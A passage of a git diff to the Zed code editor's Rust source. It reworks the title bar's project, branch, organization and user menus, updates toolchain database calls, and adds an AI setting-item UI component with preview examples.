cx.update(|cx| { - let Ok(multi_workspace) = multi_workspace_handle.entity(cx) else { - return; - }; - - let is_open = multi_workspace.read(cx).is_sidebar_open(); - let has_notifications = multi_workspace.read(cx).sidebar_has_notifications(cx); - platform_titlebar.update(cx, |titlebar, cx| { - titlebar.set_workspace_sidebar_open(is_open, cx); - titlebar.set_sidebar_has_notifications(has_notifications, cx); - }); - - let platform_titlebar = platform_titlebar.clone(); - let subscription = cx.observe(&multi_workspace, move |mw, cx| { - let is_open = mw.read(cx).is_sidebar_open(); - let has_notifications = mw.read(cx).sidebar_has_notifications(cx); - platform_titlebar.update(cx, |titlebar, cx| { - titlebar.set_workspace_sidebar_open(is_open, cx); - titlebar.set_sidebar_has_notifications(has_notifications, cx); - }); - }); - - if let Some(this) = this.upgrade() { - this.update(cx, |this, _| { - this._subscriptions.push(subscription); - }); - } - }); - }) - .detach(); - } + let platform_titlebar = cx.new(|cx| { + let mut titlebar = PlatformTitleBar::new(id, cx); + if let Some(mw) = multi_workspace.clone() { + titlebar = titlebar.with_multi_workspace(mw); + } + titlebar + }); - Self { + let mut this = Self { platform_titlebar, application_menu, workspace: workspace.weak_handle(), + multi_workspace, project, user_store, client, _subscriptions: subscriptions, - banner, + banner: None, update_version, screen_share_popover_handle: PopoverMenuHandle::default(), - } + _diagnostics_subscription: None, + }; + + this.observe_diagnostics(cx); + + this } fn worktree_count(&self, cx: &App) -> usize { @@ -481,14 +487,15 @@ impl TitleBar { let git_store = project.git_store().read(cx); let worktree_path = worktree.read(cx).abs_path(); - for repo in git_store.repositories().values() { - let repo_path = &repo.read(cx).work_directory_abs_path; - if worktree_path == *repo_path || worktree_path.starts_with(repo_path.as_ref()) { - return Some(repo.clone()); - } - } - - None + git_store + .repositories() + .values() + .filter(|repo| { + let repo_path = &repo.read(cx).work_directory_abs_path; + worktree_path == *repo_path || worktree_path.starts_with(repo_path.as_ref()) + }) + .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len()) + .cloned() } fn render_remote_project_connection(&self, cx: &mut Context) -> Option { @@ -604,10 +611,11 @@ impl TitleBar { .style(ButtonStyle::Tinted(TintColor::Warning)) .label_size(LabelSize::Small) .color(Color::Warning) - .icon(IconName::Warning) - .icon_color(Color::Warning) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::Warning) + .size(IconSize::Small) + .color(Color::Warning), + ) .tooltip(|_, cx| { Tooltip::with_meta( "You're in Restricted Mode", @@ -683,49 +691,14 @@ impl TitleBar { ) } - fn render_workspace_sidebar_toggle( + fn render_project_name( &self, - _window: &mut Window, + name: Option, + _: &mut Window, cx: &mut Context, - ) -> Option { - if !cx.has_flag::() || DisableAiSettings::get_global(cx).disable_ai { - return None; - } - - let is_sidebar_open = self.platform_titlebar.read(cx).is_workspace_sidebar_open(); - - if is_sidebar_open { - return None; - } - - let has_notifications = self.platform_titlebar.read(cx).sidebar_has_notifications(); - - Some( - IconButton::new("toggle-workspace-sidebar", IconName::WorkspaceNavClosed) - .icon_size(IconSize::Small) - .when(has_notifications, |button| { - button - .indicator(Indicator::dot().color(Color::Accent)) - .indicator_border_color(Some(cx.theme().colors().title_bar_background)) - }) - .tooltip(move |_, cx| { - Tooltip::for_action("Open Workspace Sidebar", &ToggleWorkspaceSidebar, cx) - }) - .on_click(|_, window, cx| { - window.dispatch_action(ToggleWorkspaceSidebar.boxed_clone(), cx); - }) - .into_any_element(), - ) - } - - pub fn render_project_name(&self, cx: &mut Context) -> impl IntoElement { + ) -> impl IntoElement { let workspace = self.workspace.clone(); - let name = self.effective_active_worktree(cx).map(|worktree| { - let worktree = worktree.read(cx); - SharedString::from(worktree.root_name().as_unix_str().to_string()) - }); - let is_project_selected = name.is_some(); let display_name = if let Some(ref name) = name { @@ -734,15 +707,49 @@ impl TitleBar { "Open Recent Project".to_string() }; + let is_sidebar_open = self + .multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| mw.read(cx).sidebar_open()) + .unwrap_or(false) + && PlatformTitleBar::is_multi_workspace_enabled(cx); + + let is_threads_list_view_active = self + .multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| mw.read(cx).is_threads_list_view_active(cx)) + .unwrap_or(false); + + if is_sidebar_open && is_threads_list_view_active { + return self + .render_recent_projects_popover(display_name, is_project_selected, cx) + .into_any_element(); + } + let focus_handle = workspace .upgrade() .map(|w| w.read(cx).focus_handle(cx)) .unwrap_or_else(|| cx.focus_handle()); + let sibling_workspace_ids: HashSet = self + .multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| { + mw.read(cx) + .workspaces() + .filter_map(|ws| ws.read(cx).database_id()) + .collect() + }) + .unwrap_or_default(); + PopoverMenu::new("recent-projects-menu") .menu(move |window, cx| { Some(recent_projects::RecentProjects::popover( workspace.clone(), + sibling_workspace_ids.clone(), false, focus_handle.clone(), window, @@ -753,9 +760,11 @@ impl TitleBar { Button::new("project_name_trigger", display_name) .label_size(LabelSize::Small) .when(self.worktree_count(cx) > 1, |this| { - this.icon(IconName::ChevronDown) - .icon_color(Color::Muted) - .icon_size(IconSize::XSmall) + this.end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::XSmall) + .color(Color::Muted), + ) }) .selected_style(ButtonStyle::Tinted(TintColor::Accent)) .when(!is_project_selected, |s| s.color(Color::Muted)), @@ -773,13 +782,78 @@ impl TitleBar { .into_any_element() } - pub fn render_project_branch(&self, cx: &mut Context) -> Option { - let effective_worktree = self.effective_active_worktree(cx)?; - let repository = self.get_repository_for_worktree(&effective_worktree, cx)?; + fn render_recent_projects_popover( + &self, + display_name: String, + is_project_selected: bool, + cx: &mut Context, + ) -> impl IntoElement { + let workspace = self.workspace.clone(); + + let focus_handle = workspace + .upgrade() + .map(|w| w.read(cx).focus_handle(cx)) + .unwrap_or_else(|| cx.focus_handle()); + + let sibling_workspace_ids: HashSet = self + .multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| { + mw.read(cx) + .workspaces() + .filter_map(|ws| ws.read(cx).database_id()) + .collect() + }) + .unwrap_or_default(); + + PopoverMenu::new("sidebar-title-recent-projects-menu") + .menu(move |window, cx| { + Some(recent_projects::RecentProjects::popover( + workspace.clone(), + sibling_workspace_ids.clone(), + false, + focus_handle.clone(), + window, + cx, + )) + }) + .trigger_with_tooltip( + Button::new("project_name_trigger", display_name) + .label_size(LabelSize::Small) + .when(self.worktree_count(cx) > 1, |this| { + this.end_icon( + Icon::new(IconName::ChevronDown) + .size(IconSize::XSmall) + .color(Color::Muted), + ) + }) + .selected_style(ButtonStyle::Tinted(TintColor::Accent)) + .when(!is_project_selected, |s| s.color(Color::Muted)), + move |_window, cx| { + Tooltip::for_action( + "Recent Projects", + &zed_actions::OpenRecent { + create_new_window: false, + }, + cx, + ) + }, + ) + .anchor(gpui::Corner::TopLeft) + } + + fn render_project_branch( + &self, + repository: Entity, + linked_worktree_name: Option, + cx: &mut Context, + ) -> Option { let workspace = self.workspace.upgrade()?; let (branch_name, icon_info) = { let repo = repository.read(cx); + let branch_name = repo .branch .as_ref() @@ -812,8 +886,8 @@ impl TitleBar { (branch_name, icon_info) }; + let branch_name = branch_name?; let settings = TitleBarSettings::get_global(cx); - let effective_repository = Some(repository); Some( @@ -829,23 +903,42 @@ impl TitleBar { )) }) .trigger_with_tooltip( - Button::new("project_branch_trigger", branch_name?) + ButtonLike::new("project_branch_trigger") .selected_style(ButtonStyle::Tinted(TintColor::Accent)) - .label_size(LabelSize::Small) - .color(Color::Muted) - .when(settings.show_branch_icon, |branch_button| { - let (icon, icon_color) = icon_info; - branch_button - .icon(icon) - .icon_position(IconPosition::Start) - .icon_color(icon_color) - .icon_size(IconSize::Indicator) - }), + .child( + h_flex() + .gap_0p5() + .when(settings.show_branch_icon, |this| { + let (icon, icon_color) = icon_info; + this.child( + Icon::new(icon).size(IconSize::XSmall).color(icon_color), + ) + }) + .when_some(linked_worktree_name.as_ref(), |this, worktree_name| { + this.child( + Label::new(worktree_name) + .size(LabelSize::Small) + .color(Color::Muted), + ) + .child( + Label::new("/").size(LabelSize::Small).color( + Color::Custom( + cx.theme().colors().text_muted.opacity(0.4), + ), + ), + ) + }) + .child( + Label::new(branch_name) + .size(LabelSize::Small) + .color(Color::Muted), + ), + ), move |_window, cx| { Tooltip::with_meta( - "Recent Branches", + "Git Switcher", Some(&zed_actions::git::Branch), - "Local branches only", + "Worktrees, Branches, and Stashes", cx, ) }, @@ -872,9 +965,23 @@ impl TitleBar { } fn active_call_changed(&mut self, cx: &mut Context) { + self.observe_diagnostics(cx); cx.notify(); } + fn observe_diagnostics(&mut self, cx: &mut Context) { + let diagnostics = ActiveCall::global(cx) + .read(cx) + .room() + .and_then(|room| room.read(cx).diagnostics().cloned()); + + if let Some(diagnostics) = diagnostics { + self._diagnostics_subscription = Some(cx.observe(&diagnostics, |_, _, cx| cx.notify())); + } else { + self._diagnostics_subscription = None; + } + } + fn share_project(&mut self, cx: &mut Context) { let active_call = ActiveCall::global(cx); let project = self.project.clone(); @@ -958,110 +1065,80 @@ impl TitleBar { }) } - pub fn render_organization_menu_button(&mut self, cx: &mut Context) -> AnyElement { - let Some(organization) = self.user_store.read(cx).current_organization() else { - return Empty.into_any_element(); - }; - - PopoverMenu::new("organization-menu") - .anchor(Corner::TopRight) - .menu({ - let user_store = self.user_store.clone(); - move |window, cx| { - ContextMenu::build(window, cx, |mut menu, _window, cx| { - menu = menu.header("Organizations").separator(); - - let current_organization = user_store.read(cx).current_organization(); - - for organization in user_store.read(cx).organizations() { - let organization = organization.clone(); - let plan = user_store.read(cx).plan_for_organization(&organization.id); - - let is_current = - current_organization - .as_ref() - .is_some_and(|current_organization| { - current_organization.id == organization.id - }); - - menu = menu.custom_entry( - { - let organization = organization.clone(); - move |_window, _cx| { - h_flex() - .w_full() - .gap_1() - .child( - div() - .flex_none() - .when(!is_current, |parent| parent.invisible()) - .child(Icon::new(IconName::Check)), - ) - .child( - h_flex() - .w_full() - .gap_3() - .justify_between() - .child(Label::new(&organization.name)) - .child(PlanChip::new( - plan.unwrap_or(Plan::ZedFree), - )), - ) - .into_any_element() - } - }, - { - let user_store = user_store.clone(); - let organization = organization.clone(); - move |_window, cx| { - user_store.update(cx, |user_store, _cx| { - user_store - .set_current_organization(organization.clone()); - }); - } - }, - ); - } - - menu - }) - .into() - } - }) - .trigger_with_tooltip( - Button::new("organization-menu", &organization.name) - .selected_style(ButtonStyle::Tinted(TintColor::Accent)) - .label_size(LabelSize::Small), - Tooltip::text("Toggle Organization Menu"), - ) - .anchor(gpui::Corner::TopRight) - .into_any_element() - } - pub fn render_user_menu_button(&mut self, cx: &mut Context) -> impl Element { - let show_update_badge = self.update_version.read(cx).show_update_in_menu_bar(); + let show_update_button = self.update_version.read(cx).show_update_in_menu_bar(); - let user_store = self.user_store.read(cx); - let user = user_store.current_user(); + let user_store = self.user_store.clone(); + let user_store_read = user_store.read(cx); + let user = user_store_read.current_user(); let user_avatar = user.as_ref().map(|u| u.avatar_uri.clone()); let user_login = user.as_ref().map(|u| u.github_login.clone()); let is_signed_in = user.is_some(); - let has_subscription_period = user_store.subscription_period().is_some(); - let plan = user_store.plan().filter(|_| { + let has_subscription_period = user_store_read.subscription_period().is_some(); + let plan = user_store_read.plan().filter(|_| { // Since the user might be on the legacy free plan we filter based on whether we have a subscription period. has_subscription_period }); + let has_organization = user_store_read.current_organization().is_some(); + + let current_organization = user_store_read.current_organization(); + let business_organization = current_organization + .as_ref() + .filter(|organization| !organization.is_personal); + let organizations: Vec<_> = user_store_read + .organizations() + .iter() + .map(|org| { + let plan = user_store_read.plan_for_organization(&org.id); + (org.clone(), plan) + }) + .collect(); + + let show_user_picture = TitleBarSettings::get_global(cx).show_user_picture; + + let trigger = if is_signed_in && show_user_picture { + let avatar = user_avatar.map(|avatar| Avatar::new(avatar)).map(|avatar| { + if show_update_button { + avatar.indicator( + div() + .absolute() + .bottom_0() + .right_0() + .child(Indicator::dot().color(Color::Accent)), + ) + } else { + avatar + } + }); + + ButtonLike::new("user-menu").child( + h_flex() + .when_some(business_organization, |this, organization| { + this.gap_2() + .child(Label::new(&organization.name).size(LabelSize::Small)) + }) + .children(avatar), + ) + } else { + ButtonLike::new("user-menu") + .child(Icon::new(IconName::ChevronDown).size(IconSize::Small)) + }; + PopoverMenu::new("user-menu") - .anchor(Corner::TopRight) + .trigger(trigger) .menu(move |window, cx| { - ContextMenu::build(window, cx, |menu, _, _cx| { - let user_login = user_login.clone(); + let user_login = user_login.clone(); + let current_organization = current_organization.clone(); + let organizations = organizations.clone(); + let user_store = user_store.clone(); + ContextMenu::build(window, cx, |menu, _, _cx| { menu.when(is_signed_in, |this| { + let user_login = user_login.clone(); this.custom_entry( move |_window, _cx| { let user_login = user_login.clone().unwrap_or_default(); @@ -1079,7 +1156,7 @@ impl TitleBar { ) .separator() }) - .when(show_update_badge, |this| { + .when(show_update_button, |this| { this.custom_entry( move |_window, _cx| { h_flex() @@ -1100,6 +1177,58 @@ impl TitleBar { ) .separator() }) + .when(has_organization, |this| { + let mut this = this.header("Organization"); + + for (organization, plan) in &organizations { + let organization = organization.clone(); + let plan = *plan; + + let is_current = + current_organization + .as_ref() + .is_some_and(|current_organization| { + current_organization.id == organization.id + }); + + this = this.custom_entry( + { + let organization = organization.clone(); + move |_window, _cx| { + h_flex() + .w_full() + .gap_4() + .justify_between() + .child( + h_flex() + .gap_1() + .child(Label::new(&organization.name)) + .when(is_current, |this| { + this.child( + Icon::new(IconName::Check) + .color(Color::Accent), + ) + }), + ) + .child(PlanChip::new(plan.unwrap_or(Plan::ZedFree))) + .into_any_element() + } + }, + { + let user_store = user_store.clone(); + let organization = organization.clone(); + move |_window, cx| { + user_store.update(cx, |user_store, cx| { + user_store + .set_current_organization(organization.clone(), cx); + }); + } + }, + ); + } + + this.separator() + }) .action("Settings", zed_actions::OpenSettings.boxed_clone()) .action("Keymap", Box::new(zed_actions::OpenKeymap)) .action( @@ -1121,37 +1250,6 @@ impl TitleBar { }) .into() }) - .map(|this| { - if is_signed_in && TitleBarSettings::get_global(cx).show_user_picture { - let avatar = - user_avatar - .clone() - .map(|avatar| Avatar::new(avatar)) - .map(|avatar| { - if show_update_badge { - avatar.indicator( - div() - .absolute() - .bottom_0() - .right_0() - .child(Indicator::dot().color(Color::Accent)), - ) - } else { - avatar - } - }); - this.trigger_with_tooltip( - ButtonLike::new("user-menu").children(avatar), - Tooltip::text("Toggle User Menu"), - ) - } else { - this.trigger_with_tooltip( - IconButton::new("user-menu", IconName::ChevronDown) - .icon_size(IconSize::Small), - Tooltip::text("Toggle User Menu"), - ) - } - }) - .anchor(gpui::Corner::TopRight) + .anchor(Corner::TopRight) } } diff --git a/crates/title_bar/src/title_bar_settings.rs b/crates/title_bar/src/title_bar_settings.rs index 155b7b7bc797567927a70b12c677372cb92c9453..61f951ca305d1a0bb53100b883a5e77409adb54f 100644 --- a/crates/title_bar/src/title_bar_settings.rs +++ b/crates/title_bar/src/title_bar_settings.rs @@ -1,3 +1,4 @@ +use gpui::WindowButtonLayout; use settings::{RegisterSetting, Settings, SettingsContent}; #[derive(Copy, Clone, Debug, RegisterSetting)] @@ -10,6 +11,7 @@ pub struct TitleBarSettings { pub show_sign_in: bool, pub show_user_menu: bool, pub show_menus: bool, + pub button_layout: Option, } impl Settings for TitleBarSettings { @@ -24,6 +26,7 @@ impl Settings for TitleBarSettings { show_sign_in: content.show_sign_in.unwrap(), show_user_menu: content.show_user_menu.unwrap(), show_menus: content.show_menus.unwrap(), + button_layout: content.button_layout.unwrap_or_default().into_layout(), } } } diff --git a/crates/toolchain_selector/src/active_toolchain.rs b/crates/toolchain_selector/src/active_toolchain.rs index 36af60e0f792f5146b9b573bb6a060a8461fe117..a9218564b5567d86f097781b224ac0658a0d5221 100644 --- a/crates/toolchain_selector/src/active_toolchain.rs +++ b/crates/toolchain_selector/src/active_toolchain.rs @@ -117,7 +117,7 @@ impl ActiveToolchain { cx: &mut Context, ) { let editor = editor.read(cx); - if let Some((_, buffer, _)) = editor.active_excerpt(cx) + if let Some(buffer) = editor.active_buffer(cx) && let Some(worktree_id) = buffer.read(cx).file().map(|file| file.worktree_id(cx)) { let subscription = cx.subscribe_in( @@ -202,15 +202,15 @@ impl ActiveToolchain { this.worktree_for_id(worktree_id, cx) .map(|worktree| worktree.read(cx).abs_path()) })?; - workspace::WORKSPACE_DB - .set_toolchain( - workspace_id, - worktree_root_path, - relative_path.clone(), - toolchain.clone(), - ) - .await - .ok()?; + let db = cx.update(|_, cx| workspace::WorkspaceDb::global(cx)).ok()?; + db.set_toolchain( + workspace_id, + worktree_root_path, + relative_path.clone(), + toolchain.clone(), + ) + .await + .ok()?; project .update(cx, |this, cx| { this.activate_toolchain( diff --git a/crates/toolchain_selector/src/toolchain_selector.rs b/crates/toolchain_selector/src/toolchain_selector.rs index f7b451e876cb945633a951b4c00920d2ce59f455..010003cd572f85b1aa8e6d31b0fc0a511f2ebd7f 100644 --- a/crates/toolchain_selector/src/toolchain_selector.rs +++ b/crates/toolchain_selector/src/toolchain_selector.rs @@ -584,11 +584,11 @@ impl ToolchainSelector { window: &mut Window, cx: &mut Context, ) -> Option<()> { - let (_, buffer, _) = workspace + let buffer = workspace .active_item(cx)? .act_as::(cx)? .read(cx) - .active_excerpt(cx)?; + .active_buffer(cx)?; let project = workspace.project().clone(); let language_name = buffer.read(cx).language()?.name(); @@ -920,16 +920,16 @@ impl PickerDelegate for ToolchainSelectorDelegate { let worktree_abs_path_root = self.worktree_abs_path_root.clone(); let path = self.relative_path.clone(); let relative_path = self.relative_path.clone(); + let db = workspace::WorkspaceDb::global(cx); cx.spawn_in(window, async move |_, cx| { - workspace::WORKSPACE_DB - .set_toolchain( - workspace_id, - worktree_abs_path_root, - relative_path, - toolchain.clone(), - ) - .await - .log_err(); + db.set_toolchain( + workspace_id, + worktree_abs_path_root, + relative_path, + toolchain.clone(), + ) + .await + .log_err(); workspace .update(cx, |this, cx| { this.project().update(cx, |this, cx| { diff --git a/crates/ui/Cargo.toml b/crates/ui/Cargo.toml index 5eb58bf1da1f25cc273a9fc5d7c08b920d3471e9..05433bf8eebf78eccbbedff7a4bfcfb39b0022a7 100644 --- a/crates/ui/Cargo.toml +++ b/crates/ui/Cargo.toml @@ -23,13 +23,12 @@ itertools.workspace = true menu.workspace = true schemars.workspace = true serde.workspace = true -settings.workspace = true smallvec.workspace = true story = { workspace = true, optional = true } strum.workspace = true theme.workspace = true ui_macros.workspace = true -util.workspace = true +gpui_util.workspace = true [target.'cfg(windows)'.dependencies] windows.workspace = true diff --git a/crates/ui/src/components.rs b/crates/ui/src/components.rs index cce736e237e2c2500b56f13ae579dee4426b5bfb..367d80d79c9af8722091e36c8e04bafb7ef0d8b5 100644 --- a/crates/ui/src/components.rs +++ b/crates/ui/src/components.rs @@ -6,12 +6,14 @@ mod callout; mod chip; mod collab; mod context_menu; +mod count_badge; mod data_table; mod diff_stat; mod disclosure; mod divider; mod dropdown_menu; mod facepile; +mod gradient_fade; mod group; mod icon; mod image; @@ -27,6 +29,7 @@ mod notification; mod popover; mod popover_menu; mod progress; +mod redistributable_columns; mod right_click_menu; mod scrollbar; mod stack; @@ -48,12 +51,14 @@ pub use callout::*; pub use chip::*; pub use collab::*; pub use context_menu::*; +pub use count_badge::*; pub use data_table::*; pub use diff_stat::*; pub use disclosure::*; pub use divider::*; pub use dropdown_menu::*; pub use facepile::*; +pub use gradient_fade::*; pub use group::*; pub use icon::*; pub use image::*; @@ -69,6 +74,7 @@ pub use notification::*; pub use popover::*; pub use popover_menu::*; pub use progress::*; +pub use redistributable_columns::*; pub use right_click_menu::*; pub use scrollbar::*; pub use stack::*; diff --git a/crates/ui/src/components/ai.rs b/crates/ui/src/components/ai.rs index a31db264e985b3adbca26b9e8d3fb2bdca306dcb..e3ad1db794902ae28b28274a60e3593efb3be392 100644 --- a/crates/ui/src/components/ai.rs +++ b/crates/ui/src/components/ai.rs @@ -1,5 +1,7 @@ +mod ai_setting_item; mod configured_api_card; mod thread_item; +pub use ai_setting_item::*; pub use configured_api_card::*; pub use thread_item::*; diff --git a/crates/ui/src/components/ai/ai_setting_item.rs b/crates/ui/src/components/ai/ai_setting_item.rs new file mode 100644 index 0000000000000000000000000000000000000000..bfb55e4c7da688b736b4ff5c64a5767f1e930120 --- /dev/null +++ b/crates/ui/src/components/ai/ai_setting_item.rs @@ -0,0 +1,406 @@ +use crate::{IconDecoration, IconDecorationKind, Tooltip, prelude::*}; +use gpui::{Animation, AnimationExt, SharedString, pulsating_between}; +use std::time::Duration; + +#[derive(Clone, Copy, Debug, Default, PartialEq, Eq)] +pub enum AiSettingItemStatus { + #[default] + Stopped, + Starting, + Running, + Error, + AuthRequired, + Authenticating, +} + +impl AiSettingItemStatus { + fn tooltip_text(&self) -> &'static str { + match self { + Self::Stopped => "Server is stopped.", + Self::Starting => "Server is starting.", + Self::Running => "Server is active.", + Self::Error => "Server has an error.", + Self::AuthRequired => "Authentication required.", + Self::Authenticating => "Waiting for authorization…", + } + } + + fn indicator_color(&self) -> Option { + match self { + Self::Stopped => None, + Self::Starting | Self::Authenticating => Some(Color::Muted), + Self::Running => Some(Color::Success), + Self::Error => Some(Color::Error), + Self::AuthRequired => Some(Color::Warning), + } + } + + fn is_animated(&self) -> bool { + matches!(self, Self::Starting | Self::Authenticating) + } +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +pub enum AiSettingItemSource { + Extension, + Custom, + Registry, +} + +impl AiSettingItemSource { + fn icon_name(&self) -> IconName { + match self { + Self::Extension => IconName::ZedSrcExtension, + Self::Custom => IconName::ZedSrcCustom, + Self::Registry => IconName::AcpRegistry, + } + } + + fn tooltip_text(&self, label: &str) -> String { + match self { + Self::Extension => format!("{label} was installed from an extension."), + Self::Registry => format!("{label} was installed from the ACP registry."), + Self::Custom => format!("{label} was configured manually."), + } + } +} + +/// A reusable setting item row for AI-related configuration lists. +#[derive(IntoElement, RegisterComponent)] +pub struct AiSettingItem { + id: ElementId, + status: AiSettingItemStatus, + source: AiSettingItemSource, + icon: Option, + label: SharedString, + detail_label: Option, + actions: Vec, + details: Option, +} + +impl AiSettingItem { + pub fn new( + id: impl Into, + label: impl Into, + status: AiSettingItemStatus, + source: AiSettingItemSource, + ) -> Self { + Self { + id: id.into(), + status, + source, + icon: None, + label: label.into(), + detail_label: None, + actions: Vec::new(), + details: None, + } + } + + pub fn icon(mut self, element: impl IntoElement) -> Self { + self.icon = Some(element.into_any_element()); + self + } + + pub fn detail_label(mut self, detail: impl Into) -> Self { + self.detail_label = Some(detail.into()); + self + } + + pub fn action(mut self, element: impl IntoElement) -> Self { + self.actions.push(element.into_any_element()); + self + } + + pub fn details(mut self, element: impl IntoElement) -> Self { + self.details = Some(element.into_any_element()); + self + } +} + +impl RenderOnce for AiSettingItem { + fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { + let Self { + id, + status, + source, + icon, + label, + detail_label, + actions, + details, + } = self; + + let source_id = format!("source-{}", id); + let icon_id = format!("icon-{}", id); + let status_tooltip = status.tooltip_text(); + let source_tooltip = source.tooltip_text(&label); + + let icon_element = icon.unwrap_or_else(|| { + let letter = label.chars().next().unwrap_or('?').to_ascii_uppercase(); + + h_flex() + .size_5() + .flex_none() + .justify_center() + .rounded_sm() + .border_1() + .border_color(cx.theme().colors().border_variant) + .bg(cx.theme().colors().element_active.opacity(0.2)) + .child( + Label::new(SharedString::from(letter.to_string())) + .size(LabelSize::Small) + .color(Color::Muted) + .buffer_font(cx), + ) + .into_any_element() + }); + + let icon_child = if status.is_animated() { + div() + .child(icon_element) + .with_animation( + format!("icon-pulse-{}", id), + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.4, 0.8)), + |element, delta| element.opacity(delta), + ) + .into_any_element() + } else { + icon_element.into_any_element() + }; + + let icon_container = div() + .id(icon_id) + .relative() + .flex_none() + .tooltip(Tooltip::text(status_tooltip)) + .child(icon_child) + .when_some(status.indicator_color(), |this, color| { + this.child( + IconDecoration::new( + IconDecorationKind::Dot, + cx.theme().colors().panel_background, + cx, + ) + .size(px(12.)) + .color(color.color(cx)) + .position(gpui::Point { + x: px(-3.), + y: px(-3.), + }), + ) + }); + + v_flex() + .id(id) + .min_w_0() + .child( + h_flex() + .min_w_0() + .w_full() + .gap_1p5() + .justify_between() + .child( + h_flex() + .flex_1() + .min_w_0() + .gap_1p5() + .child(icon_container) + .child(Label::new(label).flex_shrink_0().truncate()) + .child( + div() + .id(source_id) + .min_w_0() + .flex_none() + .tooltip(Tooltip::text(source_tooltip)) + .child( + Icon::new(source.icon_name()) + .size(IconSize::Small) + .color(Color::Muted), + ), + ) + .when_some(detail_label, |this, detail| { + this.child( + Label::new(detail) + .color(Color::Muted) + .size(LabelSize::Small), + ) + }), + ) + .when(!actions.is_empty(), |this| { + this.child(h_flex().gap_0p5().flex_none().children(actions)) + }), + ) + .children(details) + } +} + +impl Component for AiSettingItem { + fn scope() -> ComponentScope { + ComponentScope::Agent + } + + fn preview(_window: &mut Window, cx: &mut App) -> Option { + let container = || { + v_flex() + .w_80() + .p_2() + .gap_2() + .border_1() + .border_color(cx.theme().colors().border_variant) + .bg(cx.theme().colors().panel_background) + }; + + let details_row = |icon_name: IconName, icon_color: Color, message: &str| { + h_flex() + .py_1() + .min_w_0() + .w_full() + .gap_2() + .justify_between() + .child( + h_flex() + .pr_4() + .min_w_0() + .w_full() + .gap_2() + .child( + Icon::new(icon_name) + .size(IconSize::XSmall) + .color(icon_color), + ) + .child( + div().min_w_0().flex_1().child( + Label::new(SharedString::from(message.to_string())) + .color(Color::Muted) + .size(LabelSize::Small), + ), + ), + ) + }; + + let examples = vec![ + single_example( + "MCP server with letter avatar (running)", + container() + .child( + AiSettingItem::new( + "ext-mcp", + "Postgres", + AiSettingItemStatus::Running, + AiSettingItemSource::Extension, + ) + .detail_label("3 tools") + .action( + IconButton::new("menu", IconName::Settings) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ) + .action( + IconButton::new("toggle", IconName::Check) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ), + ) + .into_any_element(), + ), + single_example( + "MCP server (stopped)", + container() + .child(AiSettingItem::new( + "custom-mcp", + "my-local-server", + AiSettingItemStatus::Stopped, + AiSettingItemSource::Custom, + )) + .into_any_element(), + ), + single_example( + "MCP server (starting, animated)", + container() + .child(AiSettingItem::new( + "starting-mcp", + "Context7", + AiSettingItemStatus::Starting, + AiSettingItemSource::Extension, + )) + .into_any_element(), + ), + single_example( + "Agent with icon (running)", + container() + .child( + AiSettingItem::new( + "ext-agent", + "Claude Agent", + AiSettingItemStatus::Running, + AiSettingItemSource::Extension, + ) + .icon( + Icon::new(IconName::AiClaude) + .size(IconSize::Small) + .color(Color::Muted), + ) + .action( + IconButton::new("restart", IconName::RotateCw) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ) + .action( + IconButton::new("delete", IconName::Trash) + .icon_size(IconSize::Small) + .icon_color(Color::Muted), + ), + ) + .into_any_element(), + ), + single_example( + "Registry agent (starting, animated)", + container() + .child( + AiSettingItem::new( + "reg-agent", + "Devin Agent", + AiSettingItemStatus::Starting, + AiSettingItemSource::Registry, + ) + .icon( + Icon::new(IconName::ZedAssistant) + .size(IconSize::Small) + .color(Color::Muted), + ), + ) + .into_any_element(), + ), + single_example( + "Error with details", + container() + .child( + AiSettingItem::new( + "error-mcp", + "Amplitude", + AiSettingItemStatus::Error, + AiSettingItemSource::Extension, + ) + .details( + details_row( + IconName::XCircle, + Color::Error, + "Failed to connect: connection refused", + ) + .child( + Button::new("logout", "Log Out") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small), + ), + ), + ) + .into_any_element(), + ), + ]; + + Some(example_group(examples).vertical().into_any_element()) + } +} diff --git a/crates/ui/src/components/ai/configured_api_card.rs b/crates/ui/src/components/ai/configured_api_card.rs index 37f9ac7602d676906565a911f1bbca6d2b40f755..c9fd129a678d008d2ff0d6833e1497f61c73d989 100644 --- a/crates/ui/src/components/ai/configured_api_card.rs +++ b/crates/ui/src/components/ai/configured_api_card.rs @@ -1,7 +1,7 @@ use crate::{Tooltip, prelude::*}; use gpui::{ClickEvent, IntoElement, ParentElement, SharedString}; -#[derive(IntoElement)] +#[derive(IntoElement, RegisterComponent)] pub struct ConfiguredApiCard { label: SharedString, button_label: Option, @@ -52,6 +52,59 @@ impl ConfiguredApiCard { } } +impl Component for ConfiguredApiCard { + fn scope() -> ComponentScope { + ComponentScope::Agent + } + + fn preview(_window: &mut Window, cx: &mut App) -> Option { + let container = || { + v_flex() + .w_72() + .p_2() + .gap_2() + .border_1() + .border_color(cx.theme().colors().border_variant) + .bg(cx.theme().colors().panel_background) + }; + + let examples = vec![ + single_example( + "Default", + container() + .child(ConfiguredApiCard::new("API key is configured")) + .into_any_element(), + ), + single_example( + "Custom Button Label", + container() + .child( + ConfiguredApiCard::new("OpenAI API key configured") + .button_label("Remove Key"), + ) + .into_any_element(), + ), + single_example( + "With Tooltip", + container() + .child( + ConfiguredApiCard::new("Anthropic API key configured") + .tooltip_label("Click to reset your API key"), + ) + .into_any_element(), + ), + single_example( + "Disabled", + container() + .child(ConfiguredApiCard::new("API key is configured").disabled(true)) + .into_any_element(), + ), + ]; + + Some(example_group(examples).into_any_element()) + } +} + impl RenderOnce for ConfiguredApiCard { fn render(self, _: &mut Window, cx: &mut App) -> impl IntoElement { let button_label = self.button_label.unwrap_or("Reset Key".into()); @@ -80,10 +133,11 @@ impl RenderOnce for ConfiguredApiCard { elem.tab_index(tab_index) 